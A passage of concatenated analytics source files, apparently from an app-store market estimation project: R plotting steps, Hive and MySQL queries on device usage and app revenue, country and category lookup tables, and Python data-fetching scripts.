For plotting daily SDA, you can compare against the Overall or Games category using the corresponding scripts.
## 80/20 Plots
- Rscript plot_80_20.R monthly_sda.csv
- Rscript plot_80_20_daily_vs_overall.R daily_sda.csv
- Rscript plot_80_20_daily_vs_games.R daily_sda.csv
## Density Plots
- Rscript plot_hist.R monthly_sda.csv
- Rscript plot_hist_daily_vs_overall.R daily_sda.csv
- Rscript plot_hist_daily_vs_games.R daily_sda.csv
## SDA Improvement Plots
- Rscript plot_improvement.R monthly_sda.csv
- Rscript plot_improvement_daily_vs_overall.R daily_sda.csv
- Rscript plot_improvement_daily_vs_games.R daily_sda.csv
## Results
The generated plots will be in the `./plots` folder.
<file_sep>/google-analytics/rincon_dump/test_predict.py
import dill
import copy
import pandas as pd
cntry_list = ['GB']
dev_list = ['Android Mobile']
for cntry in cntry_list:
for dev in dev_list:
        # convert the strings to lists so they are iterable
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
#??? Where are the non-dill'ed versions of the Rincon_Classes?
fileObject = open('./class/original/Rincon_Class_{}_{}.dill'.format(cntry[0], dev[0]), 'r')
new_class_ = dill.load(fileObject)
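        # The dill file holds a list; element 0 is the pre-trained Rincon model object.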
mdm_dat = new_class_[0].load_data('../data/MDM_0118.csv', train=False)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
#??? Is the model pre-trained in new_class_?
#Yes
pred_new = new_class_[0].predict(val_data)
pred_new.to_csv('./temp/pred_{}_{}.csv'.format(cntry, dev), index=False, header=False)
<file_sep>/evaluation/py/internal/utilities_pandas.py
"""
Pandas related utilities
"""
# Author: <NAME> <<EMAIL>>
import pandas as pd
from StringIO import StringIO
def convert_str_to_df(s):
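    # Parse a CSV-formatted string (e.g. a subprocess's stdout) into a DataFrame.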
return pd.read_csv(StringIO(s))
def add_date_column(df, date):
df['date'] = date
return df
<file_sep>/aa_au_model/heavy_usage/sql/get_sample_user_stats.sql
set hive.auto.convert.join=false;
set hive.cli.print.header = false;
set hive.exec.dynamic.partition = true;
set hive.exec.dynamic.partition.mode = nonstrict;
set start_date = '2015-04-01';
set end_date = '2015-04-30';
set week_end_date = '2015-04-25';
-- Determine active devices in each week/month for later filtering
drop table if exists period_active_weekly;
create table period_active_weekly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
insert overwrite table period_active_weekly
select
x.end_period_date,
x.device_id
from (
select
active.end_period_date,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
active_devices_weekly active
group by
active.end_period_date,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
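    -- i.e. keep only devices that were active on all 7 days of the week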
) x
;
drop table if exists period_active_monthly;
create table period_active_monthly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table period_active_monthly
select
x.end_period_date,
x.device_id
from (
select
active.end_period_date,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
active_devices_monthly active
group by
active.end_period_date,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.end_period_date)
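    -- i.e. keep only devices that were active on every day of the month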
) x
;
drop table if exists ios_devices;
create table ios_devices
as
select
device_id,
max(type) as type
from
vpn_new_device_info
where
platform = 'iOS'
and (type = 'Tablet' or type = 'Smartphone')
group by
device_id
;
drop table if exists period_users;
create table period_users (
device_id string,
type string,
total_bandwidth float
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_period_users'
;
insert overwrite table period_users
select
x.device_id,
x.type,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
sum(output_bytes + input_bytes) / 1073741824 as total_bandwidth
from
ios_devices d
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
c.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
c.device_id
order by
c.device_id desc
) x
;
drop table if exists period_users_week;
create table period_users_week (
device_id string,
type string,
total_bandwidth float
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_period_users_week'
;
insert overwrite table period_users_week
select
x.device_id,
x.type,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
sum(output_bytes + input_bytes) / 1073741824 as total_bandwidth
from
period_active_weekly active
join ios_devices d
on active.device_id = d.device_id
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
active.end_period_date = ${hiveconf:week_end_date}
and c.datestr between date_sub(${hiveconf:week_end_date}, 6) and ${hiveconf:week_end_date}
group by
c.device_id
order by
device_id desc
) x
;
drop table if exists daily_sessions_per_user;
create table daily_sessions_per_user
as
select
session.datestr,
session.device_id,
session.bundleid,
max(session.end_period_date) as weekly_end_period_date,
sum(session_duration) as session_duration,
count(*) as n_sessions
from
(
select
s.device_id,
s.bundleid,
w.end_period_date,
(endtime - starttime) as session_duration,
datestr
from
active_devices_weekly w
join period_users device
on w.device_id = device.device_id
join vpn_sample_data_session s
on w.device_id = s.device_id
and w.date = s.datestr
and s.country = 'US'
where
(
(
(endtime - starttime > 1000)
or bundleid in (
'com.google.Translate',
'com.sgn.cookiejam',
'com.bitrhymes.bingo2',
'com.weplaydots.twodots')
)
)
and s.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
-- limit 3
) as session
group by
session.datestr,
session.device_id,
session.bundleid
;
drop table if exists monthly_device_usage ;
create table monthly_device_usage(
end_date string,
device_id string,
device_type string,
bundleid string,
total_bandwidth float,
duration float,
n_sessions int
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_monthly_device_usage'
;
insert overwrite table monthly_device_usage
select
max(session.datestr) as end_date,
session.device_id,
max(d.type) as device_type,
session.bundleid,
max(d.total_bandwidth) as total_bandwidth,
sum(session.session_duration) as duration,
sum(session.n_sessions) as n_sessions
from
period_active_monthly monthly
join active_devices_monthly active
on monthly.device_id = active.device_id
and monthly.end_period_date = active.end_period_date
join period_users d
on monthly.device_id = d.device_id
join daily_sessions_per_user session
on active.date = session.datestr
and active.device_id = session.device_id
group by
session.device_id,
session.bundleid
;
drop table if exists weekly_device_usage ;
create table weekly_device_usage(
end_date string,
device_id string,
device_type string,
bundleid string,
total_bandwidth float,
duration float,
n_sessions int
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_weekly_device_usage'
;
insert overwrite table weekly_device_usage
select
max(session.datestr) as end_date,
session.device_id,
max(d.type) as device_type,
session.bundleid,
max(d.total_bandwidth) as total_bandwidth,
sum(session.session_duration) as duration,
sum(session.n_sessions) as n_sessions
from
period_active_weekly weekly
join active_devices_weekly active
on weekly.device_id = active.device_id
and weekly.end_period_date = active.end_period_date
and active.end_period_date = ${hiveconf:week_end_date}
join period_users_week d
on weekly.device_id = d.device_id
join daily_sessions_per_user session
on active.date = session.datestr
and active.device_id = session.device_id
group by
session.device_id,
session.bundleid
;
<file_sep>/int-vs-m-benchmark/sql/android/1001c1-prepare_transactional_data-collect_data.sql
/*
DESCRIPTION : collect daily transactional data for selected dates
INPUT TABLE(S) : market.downloads
market.applications
temp.settings_day_weights
temp.settings_excluded_apps
temp.settings_exchange_rates
INTERIM TABLE(S) : temp.settings_unique_appstore_instances
temp.device_installs
temp.revenue
OUTPUT TABLE(S) : temp.one_off_and_iap
QUERY STEPS : 1. create table with unique appstore instances
2. collect all transactional data, both one-off and iap for selected dates by country
*/
-- Select unique appstore instances --
DROP TEMPORARY TABLE IF EXISTS temp.settings_unique_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_unique_appstore_instances(
appstore_instance_id smallint(5) unsigned NOT NULL,
country_id int(10) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (
appstore_instance_id,
country_id)
)
AS
SELECT
DISTINCT appstore_instance_id,
country_id
FROM
temp.settings_appstore_instances
;
/* Collect transactional data
This is done in two steps: run time can occasionally be very long (> 1
hour) if it's done in one step.
Device installs are identified by the type 'download_device' in the report
and revenue by type 'download'.
The values for these types are given by delta's (i.e. transactions) that
should be multiplied by country & app-specific prices and currencies (in
contrast to the Apple App store, a publisher can specify for
each country in which currency he wants to get paid).
There is no distinction yet between the type of device installs
(free/paid). Since Google does not allow apps to switch between free and
paid, the distinction is made when joining the rankings table.
*/
DROP TEMPORARY TABLE IF EXISTS temp.device_installs;
CREATE TEMPORARY TABLE temp.device_installs(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
AS
SELECT
d.date,
suai.country_id,
d.application_id,
NULL AS revenue,
d.delta AS device_installs
FROM
market.downloads d
JOIN temp.settings_day_weights w
ON w.date = d.date
JOIN temp.settings_unique_appstore_instances suai
ON d.appstore_instance_id = suai.appstore_instance_id
LEFT JOIN temp.settings_excluded_apps sea
ON d.application_id = sea.application_id
WHERE
d.delta > 0
AND sea.application_id IS NULL
AND d.type = 'download_device'
GROUP BY
d.date,
suai.country_id,
d.application_id;
DROP TEMPORARY TABLE IF EXISTS temp.revenue;
CREATE TEMPORARY TABLE temp.revenue(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
missing_currency_id smallint(6) unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
AS
SELECT
date,
country_id,
IFNULL(parent_id, application_id) AS application_id,
-- Sum to attribute in-apps statistics to the parent app.
SUM(revenue) AS revenue,
NULL AS device_installs,
MIN(missing_currency_id) AS missing_currency_id
FROM (
SELECT
d.date,
suai.country_id,
d.application_id,
-- TODO what if d.delta * d.customer_price / ser.rate is crazy -> null | 0?
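        -- transactions (delta) x local customer price, converted via the exchange-rate table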
ROUND(SUM(d.delta * d.customer_price / ser.rate), 2) AS revenue,
MIN(IF(ser.id IS NULL, d.customer_currency_id, NULL)) AS missing_currency_id
FROM
market.downloads d FORCE KEY (PRIMARY)
JOIN temp.settings_day_weights w
ON w.date = d.date
JOIN temp.settings_unique_appstore_instances suai
ON d.appstore_instance_id = suai.appstore_instance_id
LEFT JOIN temp.settings_exchange_rates ser
ON d.customer_currency_id = ser.id
WHERE
d.delta > 0
AND d.application_id NOT IN (SELECT * FROM temp.settings_excluded_apps)
AND d.type = 'download'
AND d.customer_price > 0
GROUP BY
d.date,
suai.appstore_instance_id,
d.application_id ) x
JOIN market.applications a
ON x.application_id = a.id
GROUP BY
x.date,
x.country_id,
IFNULL(a.parent_id, x.application_id)
;
-- combine device installs and revenue in one table --
DROP TEMPORARY TABLE IF EXISTS temp.one_off_and_iap;
CREATE TEMPORARY TABLE temp.one_off_and_iap(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
SELECT
x.date,
x.country_id,
x.application_id,
SUM(x.revenue) AS revenue,
SUM(x.device_installs) AS device_installs
FROM
(SELECT
date,
country_id,
application_id,
revenue,
device_installs
FROM
temp.device_installs d
UNION
SELECT
date,
country_id,
application_id,
revenue,
device_installs
FROM
temp.revenue r) x
GROUP BY
x.date,
x.country_id,
x.application_id;
<file_sep>/financial-product-benchmark/single-model/constants.py
STORES_DICT_IOS = {
143441: u'United States',
143442: u'France',
143443: u'Germany',
143444: u'United Kingdom',
143445: u'Austria',
143446: u'Belgium',
143447: u'Finland',
143448: u'Greece',
143449: u'Ireland',
143450: u'Italy',
143451: u'Luxembourg',
143452: u'Netherlands',
143453: u'Portugal',
143454: u'Spain',
143455: u'Canada',
143456: u'Sweden',
143457: u'Norway',
143458: u'Denmark',
143459: u'Switzerland',
143460: u'Australia',
143461: u'New Zealand',
143462: u'Japan',
143463: u'Hong Kong',
143464: u'Singapore',
143465: u'China',
143466: u'South Korea',
143467: u'India',
143468: u'Mexico',
143469: u'Russia',
143470: u'Taiwan',
143471: u'Vietnam',
143472: u'South Africa',
143473: u'Malaysia',
143474: u'Philippines',
143475: u'Thailand',
143476: u'Indonesia',
143477: u'Pakistan',
143478: u'Poland',
143479: u'Saudi Arabia',
143480: u'Turkey',
143481: u'United Arab Emirates',
143482: u'Hungary',
143483: u'Chile',
143485: u'Panama',
143486: u'Sri Lanka',
143487: u'Romania',
143489: u'Czech Republic',
143491: u'Israel',
143493: u'Kuwait',
143494: u'Croatia',
143495: u'Costa Rica',
143496: u'Slovakia',
143497: u'Lebanon',
143498: u'Qatar',
143499: u'Slovenia',
143501: u'Colombia',
143502: u'Venezuela',
143503: u'Brazil',
143504: u'Guatemala',
143505: u'Argentina',
143506: u'El Salvador',
143507: u'Peru',
143508: u'Dominican Republic',
143509: u'Ecuador',
143510: u'Honduras',
143511: u'Jamaica',
143512: u'Nicaragua',
143513: u'Paraguay',
143514: u'Uruguay',
143515: u'Macau',
143516: u'Egypt',
143517: u'Kazakhstan',
143518: u'Estonia',
143519: u'Latvia',
143520: u'Lithuania',
143521: u'Malta',
143523: u'Moldova',
143524: u'Armenia',
143525: u'Botswana',
143526: u'Bulgaria',
143528: u'Jordan',
143529: u'Kenya',
143530: u'Macedonia',
143531: u'Madagascar',
143532: u'Mali',
143533: u'Mauritius',
143534: u'Niger',
143535: u'Senegal',
143536: u'Tunisia',
143537: u'Uganda',
143538: u'Anguilla',
143539: u'Bahamas',
143540: u'Antigua and Barbuda',
143541: u'Barbados',
143542: u'Bermuda',
143543: u'British Virgin Islands',
143544: u'Cayman Islands',
143545: u'Dominica',
143546: u'Grenada',
143547: u'Montserrat',
143548: u'St. Kitts and Nevis',
143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines',
143551: u'Trinidad and Tobago',
143552: u'Turks and Caicos',
143553: u'Guyana',
143554: u'Suriname',
143555: u'Belize',
143556: u'Bolivia',
143557: u'Cyprus',
143558: u'Iceland',
143559: u'Bahrain',
143560: u'Brunei',
143561: u'Nigeria',
143562: u'Oman',
143563: u'Algeria',
143564: u'Angola',
143565: u'Belarus',
143566: u'Uzbekistan',
143568: u'Azerbaijan',
143571: u'Yemen',
143572: u'Tanzania',
143573: u'Ghana',
143575: u'Albania',
143576: u'Benin',
143577: u'Bhutan',
143578: u'Burkina Faso',
143579: u'Cambodia',
143580: u'Cape Verde',
143581: u'Chad',
143582: u'Congo',
143583: u'Fiji',
143584: u'Gambia',
143585: u'Guinea-Bissau',
143586: u'Kyrgyzstan',
143587: u'Laos',
143588: u'Liberia',
143589: u'Malawi',
143590: u'Mauritania',
143591: u'Micronesia',
143592: u'Mongolia',
143593: u'Mozambique',
143594: u'Namibia',
143484: u'Nepal',
143595: u'Palau',
143597: u'Papua New Guinea',
143598: u'Sao Tome and Principe',
143599: u'Seychelles',
143600: u'Sierra Leone',
143601: u'Solomon Islands',
143602: u'Swaziland',
143603: u'Tajikistan',
143604: u'Turkmenistan',
143492: u'Ukraine',
143605: u'Zimbabwe'}
CATEGORIES_DICT_IOS = {
36: u'Overall',
100: u'Applications',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Games Action',
7002: u'Games Adventure',
7003: u'Games Arcade',
7004: u'Games Board',
7005: u'Games Card',
7006: u'Games Casino',
7007: u'Games Dice',
7008: u'Games Education',
7009: u'Games Family',
7010: u'Games Kids',
7011: u'Games Music',
7012: u'Games Puzzle',
7013: u'Games Racing',
7014: u'Games Role Playing',
7015: u'Games Simulation',
7016: u'Games Sports',
7017: u'Games Strategy',
7018: u'Games Trivia',
7019: u'Games Word',
360: u'Kids',
361: u'Kids 5 & Under',
362: u'Kids Ages 6-8',
363: u'Kids Ages 9-11',
}
FEEDS_DICT_IOS = {
    0: 'iphone_free',
    1: 'iphone_paid',
    2: 'iphone_revenue',
    100: 'ipad_paid',
    101: 'ipad_free',
    102: 'ipad_revenue'}
STORES_DICT_ANDROID = {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria',
36: u'Czech Republic',
37: u'Hungary',
38: u'Denmark',
39: u'Ireland',
40: u'Israel',
41: u'New Zealand',
42: u'Norway',
43: u'Portugal',
44: u'Romania',
45: u'Slovakia',
46: u'Greece',
47: u'Bulgaria',
48: u'Ukraine',
49: u'United Arab Emirates',
50: u'Kuwait'}
FEEDS_DICT_ANDROID = {
    0: 'free',
    1: 'paid',
    2: 'grossing'}
CATEGORIES_DICT_ANDROID = {
1: u'Overall',
2: u'Games',
3: u'Games Arcade & Action',
4: u'Games Brain & Puzzle',
5: u'Games Cards & Casino',
6: u'Games Casual',
7: u'Games Live Wallpaper',
8: u'Games Racing',
9: u'Games Sports',
10: u'Games Widgets',
11: u'Applications',
12: u'Books & Reference',
13: u'Business',
14: u'Comics',
15: u'Communication',
16: u'Education',
17: u'Entertainment',
18: u'Finance',
19: u'Health & Fitness',
20: u'Libraries & Demo',
21: u'Lifestyle',
22: u'Apps Live Wallpaper',
23: u'Media & Video',
24: u'Medical',
25: u'Music & Audio',
26: u'News & Magazines',
27: u'Personalization',
28: u'Photography',
29: u'Productivity',
30: u'Shopping',
31: u'Social',
32: u'Sports',
33: u'Tools',
34: u'Transportation',
35: u'Travel & Local',
36: u'Weather',
37: u'App Widgets',
38: u'Games Action',
39: u'Games Adventure',
40: u'Games Word',
41: u'Games Arcade',
42: u'Games Board',
43: u'Games Card',
44: u'Games Casino',
46: u'Games Educational',
47: u'Games Family',
48: u'Games Music',
49: u'Games Puzzle',
51: u'Games Role Playing',
52: u'Games Simulation',
54: u'Games Strategy',
55: u'Games Trivia',
}
<file_sep>/old_investigations/merge_original_and_weighted.py
'''
Created on Dec 24, 2012
@author: perezrafael
'''
import os
import pandas as pd
if __name__ == '__main__':
original_path = './data_original'
weighted_path = './data_weighted'
merged_path = './data_merged'
if not os.path.exists(merged_path):
os.makedirs(merged_path)
for filename in os.listdir(original_path):
f_original = os.path.join(original_path, filename)
f_weighted = os.path.join(weighted_path, filename)
f_merged = os.path.join(merged_path, filename)
df_original = pd.read_csv(f_original)
df_weighted = pd.read_csv(f_weighted)
df_original = df_original[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
df_weighted = df_weighted[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
df_merged = pd.merge(df_original, df_weighted, on=['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units'])
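        # pandas suffixes the overlapping 'estimate' columns as _x/_y; rename them for clarity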
df_merged = df_merged.rename(columns={'estimate_x': 'original_estimate', 'estimate_y': 'weighted_estimate'})
df_merged = df_merged.sort(columns = ['store_id', 'category_id', 'feed_id', 'date', 'rank'])
df_merged.to_csv(f_merged)<file_sep>/audience/loaded_dice/lib/constants.py
STORE_ID = 143441
BIN_LABELS = ['14-18','18-25','25-35','35-45','45-55','55+']
ERROR_CUTOFF = {'0.10':140,'0.075':270,'0.05':600}
BINNED_AGES_REVIEW_QUERY = """
SELECT
res.app_id,
res.reviewer,
res.age,
res.bin
FROM (
SELECT
rev1.app_id,
EXTRACT(YEAR FROM rev1.date) as year,
EXTRACT(MONTH FROM rev1.date) as month,
rev1.reviewer,
rev1.birthyear,
rev1.age,
MAX(rev1.age) OVER (PARTITION BY rev1.app_id,rev1.reviewer) as max_age,
CASE
WHEN 14<=rev1.age AND rev1.age<18 THEN '14-18'
WHEN 18<=rev1.age AND rev1.age<25 THEN '18-25'
WHEN 25<=rev1.age AND rev1.age<35 THEN '25-35'
WHEN 35<=rev1.age AND rev1.age<45 THEN '35-45'
WHEN 45<=rev1.age AND rev1.age<55 THEN '45-55'
WHEN 55<=rev1.age THEN '55+'
END as bin
FROM (
SELECT
rev.app_id,
rev.date,
rev.reviewer,
rev.year_token as birthyear,
date_part('year', rev.date)::int-year_token as age
FROM (
SELECT
app_id,
date,
reviewer,
UNNEST(regexp_matches(reviewer, '[^\d](\d{{4}})[^\d]|^(\d{{4}})|(\d{{4}})$','g')::integer[]) as year_token
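                    -- any 4-digit token in the reviewer name is treated as a candidate birth year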
FROM
aa_review
WHERE
store_id = {store_id}
and app_id IN ({app_ids})
and date between date('{begin_date}') and date('{end_date}')
) rev
WHERE
year_token IS NOT NULL AND
to_date(to_char(rev.year_token,'9999'),'YYYY') <@ daterange('1930-01-01','2000-01-01')
) rev1
) res
WHERE
res.age=res.max_age
GROUP BY
app_id, reviewer, age, bin
"""
TOTAL_REVIEWS_QUERY = """
SELECT
app_id,
count(DISTINCT reviewer) as review_count
FROM
aa_review
WHERE
store_id = {store_id}
and app_id IN ({app_ids})
and date between date('{begin_date}') and date('{end_date}')
GROUP BY
app_id
"""
AUDIENCE_BINNED_AGES_QUERY = """
SELECT
app_id,
ages
FROM
est_demographics
WHERE
granularity = 12
and store_id = {store_id}
and app_id IN ({app_ids})
and year = {year}
and month = {month}
"""
<file_sep>/int-vs-m-benchmark/sql/android/1001c2-prepare_transactional_data-weighted_averaging.sql
/*
DESCRIPTION : average downloads and revenue over the selected dates
INPUT TABLE(S) : temp.one_off_and_iap
market.applications
temp.settings_day_weights
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) :
QUERY STEPS : 1. select dates to use for estimation
2. collect all transactional data for the selected time frame
3. check if all applications have complete data for the selected time frame
4. filter applications with incomplete data
*/
-- TOTAL NUMBER OF DAYS FOR WHICH TRANSACTIONAL DATA IS COLLECTED --
SELECT COUNT(DISTINCT date) FROM temp.settings_day_weights WHERE weight > 0 INTO @transactional_days;
/*
For transactional data, applications are selected if they meet the following conditions:
- the created date is no later than @date (helpful when run historically
because created date can be in the future if new developer account
connected and app not ranked previously)
- the weighted average is non-zero and not null
*/
-- CREATING TRANSACTIONAL DATA --
DROP TEMPORARY TABLE IF EXISTS temp.transactional_data;
CREATE TEMPORARY TABLE temp.transactional_data(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('gross','paid','free'),
application_id int(10) unsigned NOT NULL,
value decimal(8,2) NOT NULL,
n_days_with_historical_data smallint(5) unsigned,
CONSTRAINT PRIMARY KEY (
date,
application_id,
country_id,
type)
)
AS
SELECT
date,
country_id,
t.type,
application_id,
CASE
WHEN t.type = 'gross' THEN revenue
-- Duplicate entries for device_installs, distinction between free and
-- paid downloads is made in joining the rankings table.
WHEN t.type in ('free', 'paid') THEN device_installs
END AS value,
n_days_with_historical_data
FROM (
SELECT
d.date,
d.country_id,
d.application_id,
DATEDIFF(@date, a.created) as n_days_with_historical_data,
ROUND(SUM(w.weight * d.revenue), 2) AS revenue,
ROUND(SUM(w.weight * d.device_installs), 2) AS device_installs
FROM
temp.one_off_and_iap d
JOIN temp.settings_day_weights w
ON d.date = w.date
JOIN market.applications a
ON d.application_id = a.id
GROUP BY
d.date,
d.country_id,
d.application_id
HAVING n_days_with_historical_data >= 0 -- it can be negative if created date is developer account connected date and not ranked date
) x
-- JOIN types in order to have one row per app per type
JOIN (
SELECT 'free' AS type
UNION
SELECT 'paid' AS type
UNION
SELECT 'gross' AS type) t
HAVING
value is NOT NULL
AND value <> 0;
<file_sep>/aa_au_model/hiveql_scripts/get_connected_devices_per_day.sql
-- get per day a list of devices that were connected on that day
-- time zone is in UTC
-- change date range and folder to output data to on ds environment
DROP TABLE IF EXISTS connected_devices_day;
CREATE TABLE connected_devices_day
AS
SELECT device_id, datestr
FROM vpn_sample_data_connection_session
WHERE datestr >= '2015-01-10'
AND datestr <= '2015-01-31'
GROUP BY device_id, datestr
;
DROP TABLE IF EXISTS csvexport;
CREATE TABLE csvexport (
device_id STRING,
local_date STRING)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
INSERT OVERWRITE TABLE csvexport
SELECT * FROM connected_devices_day;
<file_sep>/old_investigations/android/internal/stores_dict.py
"""
Translate the number to names.
"""
category_dict = {1: u'OVERALL',
2: u'GAME',
3: u'ARCADE',
4: u'BRAIN',
5: u'CARDS',
6: u'CASUAL',
7: u'GAME_WALLPAPER',
8: u'RACING',
9: u'SPORTS_GAMES',
10: u'GAME_WIDGETS',
11: u'APPLICATION',
12: u'BOOKS_AND_REFERENCE',
13: u'BUSINESS',
14: u'COMICS',
15: u'COMMUNICATION',
16: u'EDUCATION',
17: u'ENTERTAINMENT',
18: u'FINANCE',
19: u'HEALTH_AND_FITNESS',
20: u'LIBRARIES_AND_DEMO',
21: u'LIFESTYLE',
22: u'APP_WALLPAPER',
23: u'MEDIA_AND_VIDEO',
24: u'MEDICAL',
25: u'MUSIC_AND_AUDIO',
26: u'NEWS_AND_MAGAZINES',
27: u'PERSONALIZATION',
28: u'PHOTOGRAPHY',
29: u'PRODUCTIVITY',
30: u'SHOPPING',
31: u'SOCIAL',
32: u'SPORTS',
33: u'TOOLS',
34: u'TRANSPORTATION',
35: u'TRAVEL_AND_LOCAL',
36: u'WEATHER',
37: u'APP_WIDGETS'}
type_dict = {0: "FREE", 1: "PAID", 2: "GROSSING"}
units_type_dict = {0: "Downloads", 1: "Downloads", 2: "USD"}
country_dict = {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria'
}
def query_stores_dict(x, t):
    # Look up the matching query_<t> helper directly instead of using eval().
    return globals()["query_%s" % t](x)
def query_category(x):
return category_dict[int(x)]
def query_market(x):
return "ANDROID"
def query_type(x):
return type_dict[int(x)]
def query_units_type(x):
return units_type_dict[int(x)]
def query_country(x):
return country_dict[int(x)]
def query_date(x):
return x
<file_sep>/evaluation/py/internal/est_fetcher.py
"""
Fetcher for estimation.
"""
# Author: <NAME> <<EMAIL>>
import sys
import subprocess
import itertools
from joblib import Parallel, delayed
import pandas as pd
import os.path
import commands
import datetime
import zipfile
import utilities_date
import utilities_pandas
import stores_dict
columns_dict = {'App ID':'app_id',
'App Estimate':'estimate'}
def _run_fetch_script(script_path, store, feed, dt, dtstart, type):
cmd = "python %s -s %s -f %s -d %s -t %s" % (script_path, store, feed, dt, type)
print(cmd)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
df = utilities_pandas.convert_str_to_df(stdout_value)
return utilities_pandas.add_date_column(df, dt)
except Exception as e:
print(e)
sys.exit(2)
def _replace_column(df, column):
replacement = pd.Series(stores_dict.ios['%s_dict'%column.lower()]).reset_index()
df = df.merge(replacement, left_on=column, right_on=0)
df = df.drop([column, 0], axis=1)
df.rename(columns={'index':column}, inplace=True)
return df
def _load_country_report(store, dt, type, device, customer):
reports_dir = '/delivery/customer_reports/%s'%customer
country_name = stores_dict.ios['country_dict'][int(store)].replace(' ', '_')
device = ('iOS' if device=='ios' else 'Android')
type = ('Monthly' if type=='monthly' else 'Weekly')
year, month, day = dt.split('-')
date = datetime.date(int(year), int(month), int(day))
if type=='Monthly':
        file_path = '%s/%s/%s/%s_%s_%s-%02d.zip' % (reports_dir, device, type, customer, device.lower(), year, int(month))
elif type=='Weekly':
week_number = int(date.strftime('%U')) + 1
file_path = '%s/%s/%s/%s-Week-%02d/Top_Apps.zip'%(reports_dir, device, type, year, week_number)
z = zipfile.ZipFile(file_path, 'r')
for filename in z.namelist():
if country_name in filename:
df = pd.read_csv(z.open(filename, 'r'))
df = df[['Market', 'Type', 'App ID', 'App Estimate']]
df = df.drop_duplicates()
market_type = pd.DataFrame(stores_dict.ios['market_type'])
df = df.merge(market_type, on=['Market', 'Type'])
